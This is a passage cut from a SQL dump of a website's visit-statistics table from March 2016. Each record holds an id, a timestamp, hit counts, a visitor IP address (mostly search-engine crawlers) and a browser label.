57157996,34,34,0,0,'141.8.184.18','other'),(13779,1457158031,1,1,0,0,'141.8.132.99','other'),(13780,1457158672,1,1,0,0,'93.158.152.26','other'),(13781,1457158806,12,12,0,0,'178.154.149.11','other'),(13782,1457158815,13,13,0,0,'93.158.152.9','other'),(13783,1457158851,18,18,0,0,'141.8.183.14','other'),(13784,1457158855,9,9,0,0,'130.193.37.21','other'),(13785,1457158859,6,6,0,0,'5.255.253.53','other'),(13786,1457159111,22,22,0,0,'141.8.184.18','other'),(13787,1457159114,3,3,0,0,'141.8.132.99','other'),(13788,1457159167,1,1,0,0,'178.154.189.204','other'),(13789,1457159187,1,0,1,0,'68.180.229.232',''),(13790,1457159296,2,0,2,0,'66.249.66.158',''),(13791,1457159812,2,2,0,0,'130.193.37.21','other'),(13792,1457159813,2,2,0,0,'130.193.51.45','other'),(13794,1457159835,1,1,0,0,'141.8.132.76','other'),(13795,1457159859,2,2,0,0,'5.255.253.10','other'),(13798,1457159862,1,1,0,0,'5.255.253.110','other'),(13799,1457159871,3,3,0,0,'5.255.253.100','other'),(13800,1457159872,2,2,0,0,'130.193.37.27','other'),(13801,1457159888,7,7,0,0,'178.154.149.11','other'),(13802,1457159902,7,7,0,0,'141.8.183.14','other'),(13803,1457159918,3,3,0,0,'141.8.142.8','other'),(13804,1457159949,3,3,0,0,'130.193.51.102','other'),(13805,1457159975,3,3,0,0,'141.8.132.79','other'),(13806,1457160033,4,4,0,0,'141.8.184.18','other'),(13807,1457160101,2,0,2,0,'66.249.66.166',''),(13808,1457160160,2,0,2,0,'66.249.66.162',''),(13809,1457160171,1,1,0,0,'40.77.167.32','other'),(13810,1457160450,1,0,1,0,'66.249.66.158',''),(13811,1457160584,3,3,0,0,'141.8.142.88','other'),(13812,1457160585,4,4,0,0,'5.255.253.55','other'),(13813,1457160589,3,3,0,0,'141.8.184.22','other'),(13814,1457160749,3,3,0,0,'141.8.142.41','other'),(13815,1457160750,3,3,0,0,'130.193.51.85','other'),(13816,1457160753,3,3,0,0,'130.193.51.43','other'),(13817,1457160757,3,3,0,0,'5.255.253.53','other'),(13818,1457160759,3,3,0,0,'130.193.37.21','other'),(13819,1457160760,3,3,0,0,'141.8.132.99','other'),(13820,1457160762,2,2,0,0,'130.193.51.45','other'),(13821,1457160767,3,3,0,0,'141.8.132.2','other'),(13822,1457160769,3,3,0,0,'93.158.152.26','other'),(13824,1457160770,1,1,0,0,'5.255.253.9','other'),(13825,1457160772,1,1,0,0,'5.255.253.110','other'),(13826,1457160774,2,2,0,0,'5.255.253.30','other'),(13827,1457160776,2,2,0,0,'141.8.132.76','other'),(13828,1457160777,1,1,0,0,'130.193.37.27','other'),(13829,1457160781,2,2,0,0,'93.158.152.9','other'),(13830,1457160784,2,2,0,0,'5.255.253.100','other'),(13831,1457160787,1,1,0,0,'5.255.253.10','other'),(13832,1457160789,1,1,0,0,'141.8.184.11','other'),(13834,1457160790,2,2,0,0,'130.193.51.81','other'),(13835,1457160803,1,1,0,0,'178.154.149.11','other'),(13836,1457160804,1,1,0,0,'141.8.183.14','other'),(13837,1457161034,1,1,0,0,'217.69.133.230','other'),(13838,1457161117,1,1,0,0,'136.243.172.46','chrome'),(13839,1457161398,1,1,0,0,'217.69.133.216','other'),(13840,1457161690,1,1,0,0,'217.69.133.234','other'),(13841,1457161692,1,1,0,0,'217.69.133.240','other'),(13842,1457161808,1,0,1,0,'66.249.66.166',''),(13843,1457161834,4,4,0,0,'141.8.184.18','other'),(13845,1457161986,1,1,0,0,'180.76.15.33','other'),(13846,1457162086,1,1,0,0,'66.249.93.86','firefox'),(13847,1457162119,1,1,0,0,'217.69.143.64','other'),(13848,1457162347,1,1,0,0,'217.69.136.208','other'),(13849,1457162505,1,1,0,0,'217.69.133.222','other'),(13850,1457162533,1,0,1,0,'66.249.66.133',''),(13851,1457162542,3,3,0,0,'136.243.172.46','chrome'),(13852,1457162587,1,0,1,0,'66.249.66.162',''),(13853,1457162934,6,6,0,0,'40.77.167.32','other'),(13854,1457162947,8,8,0,0,'157.55.39.125','other'),(13855,1457162955,4,4,0,0,'207.46.13.90','other'),(13856,1457162959,2,2,0,0,'207.46.13.143','other'),(13857,1457163211,1,1,0,0,'141.8.184.18','other'),(13858,1457163289,1,0,1,0,'66.249.66.166',''),(13859,1457163407,1,0,1,0,'66.249.66.158',''),(13860,1457163604,2,1,1,0,'66.249.66.158',''),(13861,1457163627,1,0,1,0,'66.249.66.162',''),(13862,1457163991,2,1,1,0,'66.249.66.158',''),(13863,1457164092,3,3,0,0,'136.243.172.46','chrome'),(13864,1457164427,1,0,1,0,'68.180.229.232',''),(13865,1457164518,1,1,0,0,'95.135.240.243','chrome'),(13866,1457164581,1,1,0,0,'176.193.163.56','msie'),(13867,1457164590,1,0,1,0,'66.249.66.162',''),(13868,1457164737,14,14,0,0,'178.154.149.11','other'),(13870,1457164738,17,17,0,0,'141.8.184.18','other'),(13871,1457164739,15,15,0,0,'141.8.183.14','other'),(13873,1457164745,5,5,0,0,'93.158.152.9','other'),(13874,1457164749,4,4,0,0,'130.193.37.21','other'),(13875,1457164750,7,7,0,0,'5.255.253.53','other'),(13876,1457164806,2,2,0,0,'141.8.132.99','other'),(13878,1457164814,2,2,0,0,'5.255.253.10','other'),(13879,1457164817,1,1,0,0,'130.193.51.45','other'),(13880,1457164818,1,1,0,0,'130.193.51.43','other'),(13881,1457164820,1,1,0,0,'141.8.132.2','other'),(13883,1457164821,1,1,0,0,'141.8.184.11','other'),(13884,1457164872,159,159,0,0,'94.154.239.69','other'),(13885,1457164893,1,1,0,0,'66.249.66.133','other'),(13886,1457164999,2,0,2,0,'66.249.66.129',''),(13887,1457165019,1,1,0,0,'128.68.14.110','msie'),(13888,1457165081,1,1,0,0,'66.249.92.95','other'),(13889,1457165162,2,1,1,0,'66.249.66.129',''),(13890,1457165211,1,1,0,0,'66.249.66.166','other'),(13891,1457165331,1,1,0,0,'66.249.66.190','other'),(13892,1457165574,4,3,1,0,'66.249.66.162',''),(13893,1457165654,18,18,0,0,'82.193.127.15','other'),(13894,1457166000,1,1,0,0,'180.76.15.29','other'),(13895,1457166175,1,1,0,0,'8.29.198.26','other'),(13896,1457166335,2,1,1,0,'66.249.66.158',''),(13897,1457166350,1,1,0,0,'217.69.133.225','other'),(13898,1457166529,1,1,0,0,'91.196.178.35','chrome'),(13899,1457166554,1,1,0,0,'91.196.178.101','chrome'),(13900,1457166587,2,0,2,0,'66.249.66.162',''),(13901,1457166672,2,2,0,0,'66.249.66.166','other'),(13902,1457166693,28,28,0,0,'82.193.127.15','other'),(13903,1457167182,2,2,0,0,'66.249.66.158','other'),(13904,1457167236,1,1,0,0,'217.69.133.232','other'),(13905,1457167312,1,1,0,0,'217.69.133.67','other'),(13906,1457167372,11,11,0,0,'141.8.184.18','other'),(13907,1457167373,7,7,0,0,'178.154.149.11','other'),(13908,1457167378,1,1,0,0,'141.8.183.14','other'),(13909,1457167405,2,2,0,0,'66.249.66.162','other'),(13910,1457167725,1,0,1,0,'66.249.66.129',''),(13911,1457167766,2,1,1,0,'66.249.66.190',''),(13912,1457167785,2,0,2,0,'66.249.66.166',''),(13913,1457167949,1,1,0,0,'66.249.93.86','other'),(13914,1457167966,1,1,0,0,'217.69.133.225','other'),(13915,1457167984,1,1,0,0,'217.69.136.208','other'),(13916,1457168011,1,1,0,0,'180.76.15.9','other'),(13917,1457168351,1,1,0,0,'217.69.133.230','other'),(13918,1457168377,1,1,0,0,'46.188.98.203','chrome'),(13919,1457168378,1,1,0,0,'93.80.95.148','chrome'),(13922,1457168380,1,1,0,0,'37.204.136.8','chrome'),(13923,1457168482,2,2,0,0,'66.249.66.158','other'),(13924,1457168492,1,1,0,0,'207.46.13.90','other'),(13925,1457168544,1,1,0,0,'66.249.66.166','other'),(13926,1457168569,1,1,0,0,'66.249.66.133','other'),(13927,1457168671,299,299,0,0,'94.154.239.69','other'),(13928,1457168696,1,1,0,0,'217.69.136.209','other'),(13929,1457168919,1,1,0,0,'217.69.133.222','other'),(13930,1457169275,1,0,1,0,'66.249.66.162',''),(13931,1457169519,1,1,0,0,'66.249.66.158','other'),(13932,1457169711,1,1,0,0,'95.133.238.54','firefox'),(13933,1457169788,2,2,0,0,'40.77.167.32','other'),(13934,1457170334,1,1,0,0,'66.249.66.129','other'),(13935,1457170432,3,2,1,0,'66.249.66.162',''),(13936,1457170482,4,1,3,0,'66.249.66.158',''),(13937,1457170579,3,1,2,0,'66.249.66.158',''),(13938,1457170844,2,1,1,0,'66.249.66.166',''),(13939,1457171257,1,1,0,0,'195.9.230.0','opera'),(13940,1457171307,2,2,0,0,'66.249.66.162','other'),(13941,1457171360,1,1,0,0,'5.255.253.53','other'),(13942,1457171361,1,1,0,0,'5.255.253.100','other'),(13943,1457171362,1,1,0,0,'93.158.152.26','other'),(13945,1457171363,1,1,0,0,'5.255.253.30','other'),(13946,1457171364,1,1,0,0,'141.8.142.41','other'),(13947,1457171616,1,1,0,0,'66.249.93.86','other'),(13948,1457171684,1,1,0,0,'207.46.13.143','other'),(13949,1457171845,1,1,0,0,'66.249.66.166','other'),(13950,1457172473,1,1,0,0,'66.249.66.129','other'),(13951,1457172569,1,0,1,0,'66.249.66.158',''),(13952,1457172732,1,1,0,0,'46.188.31.194','chrome'),(13953,1457172967,1,1,0,0,'217.69.133.230','other'),(13954,1457173181,1,1,0,0,'217.69.133.219','other'),(13956,1457173302,1,1,0,0,'217.69.133.223','other'),(13957,1457173306,1,1,0,0,'217.69.133.234','other'),(13958,1457173507,193,193,0,0,'62.210.148.246','other'),(13959,1457173816,1,1,0,0,'91.196.178.167','firefox'),(13960,1457173885,1,1,0,0,'217.69.133.228','other'),(13961,1457173977,1,1,0,0,'217.69.133.224','other'),(13962,1457174053,1,1,0,0,'66.249.66.166','other'),(13963,1457174292,1,0,1,0,'66.249.66.158',''),(13964,1457174464,1,1,0,0,'40.77.167.32','other'),(13965,1457174500,1,1,0,0,'217.69.136.205','other'),(13966,1457174694,2,2,0,0,'207.46.13.90','other'),(13967,1457174872,1,1,0,0,'91.196.178.165','other'),(13968,1457175127,1,1,0,0,'217.69.133.6','other'),(13969,1457175276,1,0,1,0,'66.249.66.162',''),(13970,1457175340,1,1,0,0,'66.249.93.86','other'),(13971,1457175368,1,0,1,0,'66.249.66.158',''),(13972,1457175566,1,1,0,0,'157.55.39.125','other'),(13973,1457175720,1,1,0,0,'37.52.115.171','chrome'),(13974,1457176044,1,1,0,0,'66.249.66.158','other'),(13975,1457176171,1,1,0,0,'66.249.92.103','other'),(13976,1457176620,1,1,0,0,'40.77.167.32','other'),(13977,1457176687,6,6,0,0,'141.8.184.18','other'),(13979,1457176688,2,2,0,0,'5.255.253.53','other'),(13980,1457176689,5,5,0,0,'141.8.183.14','other'),(13981,1457176690,5,5,0,0,'93.158.152.9','other'),(13982,1457176691,5,5,0,0,'178.154.149.11','other'),(13983,1457176728,1,1,0,0,'207.46.13.90','other'),(13984,1457176943,1,1,0,0,'82.193.127.15','other'),(13985,1457176985,1,1,0,0,'8.29.198.25','other'),(13986,1457177091,1,1,0,0,'195.62.15.46','firefox'),(13987,1457177176,1,1,0,0,'157.55.39.125','other'),(13988,1457177459,1,0,1,0,'66.249.66.158',''),(13989,1457177988,1,1,0,0,'178.94.136.196','firefox'),(13990,1457178494,1,1,0,0,'37.53.76.152','chrome'),(13991,1457178512,1,1,0,0,'207.46.13.90','other'),(13992,1457178564,2,2,0,0,'217.69.133.222','other'),(13993,1457178574,1,0,1,0,'66.249.66.166',''),(13994,1457178734,1,0,1,0,'66.249.66.158',''),(13995,1457178738,3,0,3,0,'66.249.66.162',''),(13996,1457178755,1,1,0,0,'66.249.93.86','other'),(13997,1457178956,1,1,0,0,'217.69.133.68','other'),(13998,1457179099,1,1,0,0,'5.255.253.110','other'),(13999,1457179100,1,1,0,0,'141.8.132.79','other'),(14000,1457179108,2,2,0,0,'5.255.253.55','other'),(14002,1457179109,2,2,0,0,'93.158.152.9','other'),(14003,1457179110,3,3,0,0,'141.8.132.99','other'),(14005,1457179112,2,2,0,0,'130.193.51.81','other'),(14006,1457179113,2,2,0,0,'130.193.51.102','other'),(14007,1457179115,2,2,0,0,'141.8.142.8','other'),(14008,1457179117,2,2,0,0,'130.193.51.43','other'),(14009,1457179120,1,1,0,0,'5.255.253.30','other'),(14011,1457179122,1,1,0,0,'141.8.183.14','other'),(14012,1457179124,1,1,0,0,'93.158.152.26','other'),(14013,1457179373,1,1,0,0,'217.69.133.229','other'),(14014,1457179498,2,2,0,0,'174.34.135.242','other'),(14015,1457179596,1,1,0,0,'157.55.39.125','other'),(14016,1457179605,1,0,1,0,'66.249.66.133',''),(14017,1457179663,1,0,1,0,'66.249.66.166',''),(14018,1457179686,1,0,1,0,'66.249.66.129',''),(14019,1457179832,1,1,0,0,'217.69.136.210','other'),(14021,1457179967,1,1,0,0,'217.69.133.70','other'),(14022,1457180169,1,1,0,0,'80.91.162.99','other'),(14023,1457180207,1,1,0,0,'217.69.133.221','other'),(14024,1457180973,1,1,0,0,'217.69.143.64','other'),(14025,1457181196,1,0,1,0,'66.249.66.166',''),(14026,1457181256,1,0,1,0,'66.249.66.133',''),(14027,1457181482,1,0,1,0,'66.249.66.190',''),(14028,1457181770,1,0,1,0,'66.249.66.162',''),(14029,1457181829,1,1,0,0,'207.46.13.90','other'),(14030,1457182006,1,1,0,0,'93.74.22.32','firefox'),(14031,1457182440,1,1,0,0,'178.154.149.11','other'),(14032,1457182442,1,1,0,0,'66.249.93.106','other'),(14033,1457182763,1,0,1,0,'66.249.66.158',''),(14034,1457182998,1,0,1,0,'66.249.66.166',''),(14035,1457183169,1,1,0,0,'109.206.48.135','chrome'),(14036,1457183293,2,0,2,0,'66.249.66.162',''),(14037,1457183750,2,0,2,0,'66.249.66.158',''),(14038,1457183754,1,0,1,0,'66.249.66.129',''),(14039,1457183977,2,0,2,0,'66.249.66.166',''),(14040,1457184199,1,0,1,0,'66.249.66.162',''),(14041,1457184558,1,1,0,0,'180.76.15.32','other'),(14042,1457184595,1,1,0,0,'217.69.133.222','other'),(14043,1457184607,1,1,0,0,'91.196.178.40','chrome'),(14044,1457184630,3,3,0,0,'141.8.184.18','other'),(14045,1457184634,5,5,0,0,'178.154.149.11','other'),(14046,1457184642,3,3,0,0,'141.8.183.14','other'),(14047,1457184650,2,2,0,0,'141.8.132.2','other'),(14048,1457184654,3,3,0,0,'141.8.132.76','other'),(14049,1457184658,2,2,0,0,'93.158.152.9','other'),(14050,1457184662,4,4,0,0,'5.255.253.9','other'),(14051,1457184666,2,2,0,0,'5.255.253.55','other'),(14052,1457184675,3,3,0,0,'141.8.142.41','other'),(14053,1457184679,2,2,0,0,'130.193.51.85','other'),(14054,1457184683,3,3,0,0,'141.8.142.8','other'),(14055,1457184699,2,2,0,0,'130.193.51.45','other'),(14056,1457184703,3,3,0,0,'93.158.152.26','other'),(14057,1457184707,3,3,0,0,'141.8.184.22','other'),(14058,1457184711,3,3,0,0,'5.255.253.30','other'),(14059,1457184715,2,2,0,0,'141.8.132.79','other'),(14060,1457184729,2,2,0,0,'5.255.253.53','other'),(14061,1457184744,2,2,0,0,'141.8.132.97','other'),(14062,1457184748,4,4,0,0,'5.255.253.110','other'),(14063,1457184752,3,3,0,0,'141.8.142.88','other'),(14064,1457184785,1,1,0,0,'130.193.37.21','other'),(14065,1457184789,2,2,0,0,'141.8.132.99','other'),(14066,1457184811,1,1,0,0,'130.193.51.81','other'),(14067,1457184823,1,1,0,0,'130.193.51.102','other'),(14068,1457184831,1,1,0,0,'217.69.133.240','other'),(14069,1457184858,2,2,0,0,'130.193.51.43','other'),(14070,1457184863,2,2,0,0,'5.255.253.10','other'),(14071,1457184870,1,1,0,0,'141.8.184.11','other'),(14072,1457184871,3,0,3,0,'68.180.229.232',''),(14073,1457184875,1,1,0,0,'141.8.142.10','other'),(14074,1457184899,1,1,0,0,'130.193.37.27','other'),(14075,1457184997,1,0,1,0,'66.249.66.158',''),(14076,1457185128,1,0,1,0,'66.249.66.162',''),(14077,1457185645,1,1,0,0,'217.69.133.231','other'),(14078,1457185687,1,0,1,0,'66.249.66.166',''),(14079,1457185880,1,1,0,0,'92.113.174.126','firefox'),(14080,1457185895,1,1,0,0,'217.69.133.220','other'),(14081,1457185987,1,1,0,0,'66.249.93.94','other'),(14082,1457186046,1,0,1,0,'66.249.66.162',''),(14083,1457186050,5,0,5,0,'66.249.66.158',''),(14084,1457186110,1,0,1,0,'68.180.229.232',''),(14085,1457186171,1,1,0,0,'130.193.51.43','other'),(14086,1457186175,1,1,0,0,'5.255.253.110','other'),(14087,1457186248,1,1,0,0,'217.69.133.240','other'),(14088,1457186372,1,1,0,0,'193.194.127.217','firefox'),(14089,1457186766,1,1,0,0,'91.124.180.84','other'),(14090,1457186870,5,5,0,0,'85.17.112.142','other'),(14091,1457186948,1,0,1,0,'66.249.66.162',''),(14092,1457187261,1,1,0,0,'66.249.92.103','other'),(14093,1457187435,1,1,0,0,'207.46.13.90','other'),(14094,1457187797,1,1,0,0,'8.29.198.25','other'),(14095,1457187957,1,0,1,0,'66.249.66.158',''),(14096,1457188632,2,0,2,0,'68.180.229.232',''),(14097,1457188716,1,0,1,0,'66.249.66.166',''),(14098,1457188859,1,1,0,0,'62.210.215.100','chrome'),(14099,1457189082,1,0,1,0,'66.249.66.158',''),(14100,1457189448,1,0,1,0,'66.249.66.162',''),(14101,1457189471,1,1,0,0,'193.194.127.217','firefox'),(14102,1457189473,1,1,0,0,'217.69.133.218','other'),(14103,1457189625,1,1,0,0,'66.249.93.94','other'),(14104,1457189748,1,1,0,0,'66.249.66.162','other'),(14105,1457190091,2,0,2,0,'68.180.229.232',''),(14106,1457190286,1,1,0,0,'217.69.133.232','other'),(14107,1457190310,1,0,1,0,'66.249.66.133',''),(14108,1457190526,1,1,0,0,'207.46.13.143','other'),(14109,1457190596,3,3,0,0,'178.154.149.11','other'),(14110,1457190604,1,1,0,0,'141.8.184.18','other'),(14111,1457190745,1,1,0,0,'93.158.152.9','other'),(14112,1457190750,1,1,0,0,'141.8.183.14','other'),(14113,1457190854,1,0,1,0,'66.249.66.129',''),(14114,1457191069,1,1,0,0,'217.69.133.240','other'),(14115,1457191116,2,1,1,0,'66.249.66.162',''),(14116,1457191186,9,0,9,0,'66.249.66.158',''),(14117,1457191224,1,1,0,0,'51.255.65.27','other'),(14118,1457191438,3,0,3,0,'66.249.66.133',''),(14119,1457191531,2,2,0,0,'62.210.215.100','chrome'),(14120,1457191644,1,0,1,0,'66.249.66.190',''),(14121,1457191671,1,1,0,0,'92.113.174.126','firefox'),(14122,1457191847,1,1,0,0,'217.69.133.235','other'),(14123,1457191848,1,1,0,0,'217.69.133.237','other'),(14124,1457191877,2,2,0,0,'66.249.66.166','other'),(14125,1457192276,2,0,2,0,'66.249.66.158',''),(14126,1457192583,1,0,1,0,'68.180.229.232',''),(14127,1457192758,1,1,0,0,'82.145.220.37','chrome'),(14128,1457193057,4,0,4,0,'66.249.66.166',''),(14129,1457193206,1,1,0,0,'66.249.93.94','other'),(14130,1457193225,1,0,1,0,'66.249.66.190',''),(14131,1457193579,2,2,0,0,'207.46.13.80','other'),(14132,1457193717,1,0,1,0,'66.249.66.158',''),(14133,1457194021,3,0,3,0,'66.249.66.166',''),(14134,1457194127,3,0,3,0,'66.249.66.162',''),(14135,1457194385,1,1,0,0,'82.193.127.15','other'),(14136,1457194556,1,0,1,0,'68.180.229.232',''),(14137,1457194564,1,1,0,0,'207.46.13.90','other'),(14138,1457194755,1,1,0,0,'40.77.167.32','other'),(14139,1457194886,1,1,0,0,'51.255.65.57','other'),(14140,1457195035,4,0,4,0,'66.249.66.158',''),(14141,1457195105,4,2,2,0,'66.249.66.162',''),(14142,1457195145,1,1,0,0,'217.69.133.215','other'),(14143,1457195313,1,1,0,0,'217.69.133.236','other'),(14144,1457195442,1,1,0,0,'217.69.133.232','other'),(14145,1457196442,2,1,1,0,'66.249.66.166',''),(14146,1457196487,1,1,0,0,'217.69.133.236','other'),(14147,1457196496,2,1,1,0,'66.249.66.158',''),(14148,1457196525,1,1,0,0,'207.46.13.143','other'),(14149,1457196526,1,1,0,0,'217.69.133.85','other'),(14150,1457196637,1,1,0,0,'51.255.65.62','other'),(14151,1457196640,1,1,0,0,'217.69.133.67','other'),(14152,1457196695,1,1,0,0,'66.249.66.129','other'),(14153,1457196865,1,0,1,0,'66.249.66.190',''),(14154,1457196931,1,1,0,0,'94.179.77.36','chrome'),(14155,1457196949,1,1,0,0,'66.249.93.94','other'),(14156,1457197093,1,1,0,0,'92.113.174.126','firefox'),(14157,1457197122,2,1,1,0,'66.249.66.158',''),(14158,1457197590,1,1,0,0,'66.249.92.99','other'),(14159,1457197596,1,1,0,0,'37.9.122.203','other'),(14160,1457197777,1,1,0,0,'217.69.133.231','other'),(14161,1457197883,2,1,1,0,'66.249.66.158',''),(14162,1457198013,4,0,4,0,'66.249.66.162',''),(14163,1457198449,1,1,0,0,'109.251.187.41','chrome'),(14164,1457198687,1,1,0,0,'8.29.198.26','other'),(14165,1457198781,2,0,2,0,'66.249.66.166',''),(14166,1457198844,1,0,1,0,'66.249.66.190',''),(14167,1457198900,1,1,0,0,'141.8.184.18','other'),(14168,1457199215,2,2,0,0,'66.249.66.166','other'),(14169,1457199238,2,2,0,0,'207.46.13.106','other'),(14170,1457199404,1,0,1,0,'66.249.66.158',''),(14171,1457199948,1,1,0,0,'66.249.66.158','other'),(14172,1457200315,3,0,3,0,'66.249.66.162',''),(14173,1457200363,1,1,0,0,'66.249.93.90','other'),(14174,1457200364,1,0,1,0,'66.249.66.133',''),(14175,1457200425,1,1,0,0,'66.249.66.129','other'),(14176,1457201035,1,1,0,0,'217.69.133.215','other'),(14177,1457201426,1,1,0,0,'217.69.133.220','other'),(14178,1457201427,1,1,0,0,'217.69.133.222','other'),(14179,1457201748,1,1,0,0,'91.196.178.38','chrome'),(14180,1457201822,1,1,0,0,'207.46.13.143','other'),(14181,1457202280,1,0,1,0,'66.249.66.166',''),(14182,1457202288,1,1,0,0,'66.249.66.158','other'),(14183,1457202301,1,0,1,0,'66.249.66.162',''),(14184,1457202539,1,1,0,0,'207.46.13.106','other'),(14185,1457202812,1,1,0,0,'217.69.136.205','other'),(14186,1457202825,1,1,0,0,'217.69.133.227','other'),(14187,1457203283,1,1,0,0,'217.69.133.235','other'),(14188,1457203456,5,3,2,0,'66.249.66.166',''),(14189,1457203484,3,1,2,0,'66.249.66.158',''),(14190,1457203727,1,0,1,0,'66.249.66.129',''),(14191,1457204088,1,1,0,0,'66.249.93.90','other'),(14192,1457204354,1,1,0,0,'141.8.132.76','other'),(14193,1457204358,1,1,0,0,'5.255.253.53','other'),(14194,1457204362,2,2,0,0,'178.154.149.11','other'),(14195,1457204367,2,2,0,0,'141.8.183.14','other'),(14196,1457204370,3,3,0,0,'141.8.184.18','other'),(14197,1457204383,1,1,0,0,'141.8.142.41','other'),(14198,1457204387,1,1,0,0,'130.193.37.21','other'),(14199,1457204391,1,1,0,0,'141.8.142.10','other'),(14200,1457204395,1,1,0,0,'141.8.132.79','other'),(14201,1457204407,1,1,0,0,'5.255.253.110','other'),(14202,1457204505,2,0,2,0,'66.249.66.158',''),(14203,1457204818,1,0,1,0,'68.180.229.232',''),(14204,1457205021,1,1,0,0,'78.111.185.77','chrome'),(14205,1457205300,1,0,1,0,'66.249.66.129',''),(14206,1457205377,5,0,5,0,'66.249.66.162',''),(14207,1457205649,4,4,0,0,'91.196.178.35','chrome'),(14208,1457205880,1,1,0,0,'207.46.13.106','other'),(14209,1457206258,1,1,0,0,'78.111.185.77','chrome'),(14210,1457206351,1,0,1,0,'66.249.66.166',''),(14211,1457206502,2,2,0,0,'93.158.152.9','other'),(14212,1457206506,4,4,0,0,'141.8.183.14','other'),(14213,1457206514,4,4,0,0,'178.154.149.11','other'),(14214,1457206522,3,3,0,0,'5.255.253.53','other'),(14215,1457206555,1,1,0,0,'130.193.37.21','other'),(14216,1457206730,1,1,0,0,'157.55.39.66','other'),(14217,1457207055,1,1,0,0,'217.69.133.237','other'),(14218,1457207056,1,1,0,0,'217.69.133.234','other'),(14219,1457207058,1,1,0,0,'217.69.133.235','other'),(14220,1457207254,4,0,4,0,'66.249.66.158',''),(14221,1457207449,1,1,0,0,'217.69.133.225','other'),(14222,1457207494,1,1,0,0,'5.255.253.110','other'),(14223,1457207497,10,10,0,0,'5.255.253.53','other'),(14224,1457207501,23,23,0,0,'178.154.149.11','other'),(14225,1457207548,1,1,0,0,'66.249.93.90','other'),(14226,1457207554,34,34,0,0,'141.8.184.18','other'),(14227,1457207558,23,23,0,0,'141.8.183.14','other'),(14228,1457207582,14,14,0,0,'93.158.152.9','other'),(14229,1457207633,3,0,3,0,'66.249.66.166',''),(14230,1457207791,1,0,1,0,'66.249.66.133',''),(14231,1457207881,1,1,0,0,'66.249.92.95','other'),(14232,1457207892,1,0,1,0,'66.249.66.162',''),(14233,1457207923,1,1,0,0,'217.69.136.204','other'),(14234,1457207988,12,12,0,0,'141.8.132.99','other'),(14235,1457207991,10,10,0,0,'130.193.37.21','other'),(14236,1457207993,5,5,0,0,'5.255.253.100','other'),(14237,1457208025,1,1,0,0,'141.8.142.8','other'),(14238,1457208026,1,1,0,0,'130.193.51.91','other'),(14239,1457208057,1,1,0,0,'207.46.13.143','other'),(14240,1457208076,3,1,2,0,'66.249.66.162',''),(14241,1457208217,2,2,0,0,'141.8.132.97','other'),(14242,1457208222,1,1,0,0,'141.8.132.79','other'),(14243,1457208248,1,1,0,0,'130.193.51.102','other'),(14244,1457208249,1,1,0,0,'141.8.142.82','other'),(14245,1457208315,2,2,0,0,'130.193.51.45','other'),(14246,1457208453,1,1,0,0,'5.255.253.79','other'),(14247,1457208454,1,1,0,0,'5.255.253.53','other'),(14248,1457208692,3,0,3,0,'66.249.66.166',''),(14249,1457208871,1,1,0,0,'157.55.39.66','other'),(14250,1457209028,1,1,0,0,'136.243.5.87','other'),(14251,1457209272,1,1,0,0,'78.111.185.77','chrome'),(14252,1457209448,3,3,0,0,'5.255.253.55','other'),(14253,1457209449,4,4,0,0,'141.8.184.18','other'),(14254,1457209521,1,1,0,0,'8.29.198.25','other'),(14255,1457209995,6,6,0,0,'141.8.132.97','other'),(14256,1457209997,2,2,0,0,'5.255.253.100','other'),(14257,1457210001,2,2,0,0,'93.158.152.9','other'),(14258,1457210013,1,1,0,0,'141.8.142.8','other'),(14259,1457210014,3,3,0,0,'130.193.51.7','other'),(14260,1457210023,2,2,0,0,'141.8.142.88','other'),(14261,1457210294,2,2,0,0,'93.158.152.81','other'),(14262,1457210296,3,3,0,0,'178.154.149.11','other'),(14263,1457210297,3,3,0,0,'5.255.253.53','other'),(14265,1457210300,3,3,0,0,'5.255.253.110','other'),(14266,1457210302,3,3,0,0,'141.8.142.41','other'),(14267,1457210303,2,2,0,0,'178.154.149.9','other'),(14268,1457210309,2,2,0,0,'5.255.253.30','other'),(14269,1457210312,2,2,0,0,'130.193.51.91','other'),(14270,1457210315,1,1,0,0,'141.8.183.14','other'),(14271,1457210316,1,1,0,0,'130.193.51.55','other'),(14272,1457210318,3,3,0,0,'141.8.132.2','other'),(14273,1457210319,1,1,0,0,'93.158.152.26','other'),(14274,1457210320,1,1,0,0,'130.193.51.81','other'),(14275,1457210322,1,1,0,0,'141.8.132.76','other'),(14276,1457210323,2,2,0,0,'130.193.51.85','other'),(14277,1457210327,1,1,0,0,'141.8.132.48','other'),(14278,1457210330,2,2,0,0,'5.255.253.9','other'),(14279,1457210331,1,1,0,0,'141.8.184.22','other'),(14280,1457210337,1,1,0,0,'141.8.132.99','other'),(14281,1457210341,1,1,0,0,'141.8.132.79','other'),(14282,1457210411,2,0,2,0,'66.249.66.129',''),(14283,1457210594,1,1,0,0,'207.46.13.143','other'),(14284,1457210627,2,0,2,0,'66.249.66.162',''),(14285,1457210866,1,1,0,0,'180.76.15.157','other'),(14286,1457211101,1,1,0,0,'207.46.13.106','other'),(14287,1457211198,2,2,0,0,'77.232.164.65','chrome'),(14288,1457211268,1,1,0,0,'66.249.93.86','other'),(14289,1457211711,3,3,0,0,'130.193.37.27','other'),(14290,1457211883,1,0,1,0,'66.249.66.162',''),(14291,1457212047,1,1,0,0,'217.69.133.232','other'),(14292,1457212075,1,1,0,0,'5.255.253.30','other'),(14293,1457212076,3,3,0,0,'5.255.253.55','other'),(14294,1457212077,4,4,0,0,'141.8.132.79','other'),(14295,1457212078,4,4,0,0,'178.154.149.11','other'),(14296,1457212079,6,6,0,0,'141.8.184.18','other'),(14297,1457212081,2,2,0,0,'93.158.152.9','other'),(14298,1457212082,4,4,0,0,'5.255.253.53','other'),(14299,1457212083,1,1,0,0,'5.255.253.100','other'),(14300,1457212090,2,2,0,0,'93.158.152.26','other'),(14301,1457212092,2,2,0,0,'5.255.253.9','other'),(14303,1457212093,3,3,0,0,'141.8.184.22','other'),(14304,1457212094,1,1,0,0,'130.193.51.102','other'),(14306,1457212095,2,2,0,0,'141.8.142.88','other'),(14307,1457212098,1,1,0,0,'141.8.132.76','other'),(14308,1457212099,2,2,0,0,'141.8.183.14','other'),(14309,1457212100,2,2,0,0,'141.8.142.41','other'),(14310,1457212101,1,1,0,0,'130.193.51.85','other'),(14312,1457212106,1,1,0,0,'130.193.37.21','other'),(14313,1457212107,2,2,0,0,'141.8.132.99','other'),(14314,1457212108,1,1,0,0,'130.193.51.45','other'),(14315,1457212109,1,1,0,0,'130.193.51.43','other'),(14316,1457212110,1,1,0,0,'141.8.132.2','other'),(14317,1457212111,1,1,0,0,'5.255.253.10','other'),(14318,1457212112,1,1,0,0,'141.8.142.10','other'),(14319,1457212114,1,1,0,0,'